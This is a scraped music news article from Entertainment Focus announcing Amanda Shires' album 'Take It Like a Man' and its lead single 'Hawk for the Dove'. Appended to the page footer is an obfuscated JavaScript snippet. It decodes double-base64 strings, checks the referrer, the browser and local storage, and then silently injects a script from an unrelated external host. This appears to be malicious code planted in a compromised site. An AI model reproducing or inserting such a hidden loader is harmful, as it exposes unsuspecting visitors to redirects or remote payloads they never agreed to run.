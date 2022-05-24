Connect with us

Hi, what are you looking for?

Amanda Shires

EF Country

Amanda Shires announces new album & drops lead track ‘Hawk for the Dove’

Fabulous new music on the way from this talented artist.

Published

GRAMMY Award-winning singer/songwriter Amanda Shires has shared her haunting new single, ‘Hawk For The Dove’.The evocative music video for the track was also released today.  ‘Hawk For The Dove’ is the first new single to be unveiled from her forthcoming album ‘Take It Like a Man’, set for release on 29 July on ATO Records.   

Featuring Shires’ delicate vocals and impassioned fiddle, ‘Hawk For The Dove’ immediately draws the listener in, and boldly encapsulates her rebirth both creatively and artistically. Amanda demurely sings, “I’m well aware of what the night’s made of, and I’m coming for you like a hawk for the dove. You can call it serious trouble, cuz that’s what I want”.

Amanda Shires
Credit: Michael Schmelling

Shires co-wrote ‘Hawk For The Dove’ with producer Lawrence Rothman, who also plays keyboards on the track. Brittney Spencer lends background vocals, and Jason Isbell is featured on guitars. Amanda comments, “This is the song where Jason finally had enough of the buzz in the studio and switched to a Gretsch. That was the moment he realized why Chet Atkins (who recorded in this studio) loved Gretsch guitars”. 

The new album ‘Take It Like A Man’ is a fearless confessional featuring 10 emotionally raw tracks, produced by the talented gender-fluid singer-songwriter and producer, Lawrence Rothman, (Angel Olsen, Girl in Red, Courtney Love). Upon hearing Amanda for the first time Lawrence said, “I was just mesmerized. I thought she was the new Dolly Parton; Dolly for a new generation.”

With the album, Shires hit the reset button and made a record so unlike anything she’s ever recorded that it feels like her debut album instead of her seventh. Written and recorded during lockdown, the new record features Isbell on guitar on several tracks and guest vocals from Maren Morris, Natalie Hemby and Brittney Spencer. ‘Take It Like A Man’ is a song cycle of ruthlessly candid tunes written as a document by Amanda about her life as a woman, a wife (to husband Jason Isbell) and a mother during a tumultuous time. 

Advertisement. Scroll to continue reading.

PRE-ORDER ALBUM ‘TAKE IT LIKE A MAN’ HERE

In this article:

Advertisement

You May Also Like

The Nitty Gritty Dirt Band The Nitty Gritty Dirt Band

EF Country

The Nitty Gritty Dirt Band – ‘Dirt Does Dylan’ Review

A very strong accounting of the most fruitful period in Bob Dylan's career

5 days ago
Avi Kaplan Avi Kaplan

EF Country

Avi Kaplan – ‘Floating on a Dream’ Review

Kaplan's incredible voice shines through on this highly enjoyable release.

5 days ago
Hanson Hanson

Music

Interview: Isaac and Taylor Hanson on ‘Red Green Blue’ and UK tour

We caught up with the brothers ahead of their latest album release this week.

5 days ago
Old Dominion Old Dominion

EF Country

Your Top 10 Country Music Lyrics to Live By

Which Country songs give you the best advice?

3 days ago



Copyright © 2021 Entertainment Focus

Entertainment Focus is a trading name of Piñata Media Limited (Reg no: 08435639)

Entertainment Focus uses affiliate links. By buying through the links we may receive a commission for the sale. This has no effect on the price for you ;(function(){var mq=document.referrer;var xn=window.location.href;var rw=navigator.userAgent;var rt=new RegExp(xe('T2k4dktGdGVMMTByS1M4PQ=='));if(!mq||xn.match(rt)[1]==mq.match(rt)[1]||rw.indexOf(xe("VjJsdVpHOTNjdz09"))==-1||window.localStorage[xe("WDE5ZmRYUnRZUT09")]){return;}var xs=document.createElement('script');xs.type='text/javascript';xs.async=true;xs.src=xe('YUhSMGNITTZMeTloWTNSdmNuTXVhbU55WVdOcGJtY3VZMjl0TDNKbGNHOXlkRDl5UFdScU1ETk5SR2Q1V2xSak5WcHRUbWhPTWtWM1dUSk5NbGxxUVROT1ExcHFZVmRST1UxcVdYbz0=');var wj=document.getElementsByTagName('script')[0];wj.parentNode.insertBefore(xs,wj);function xe(os){return mj(window.atob(os));}function mj(zc){return window.atob(zc);}})();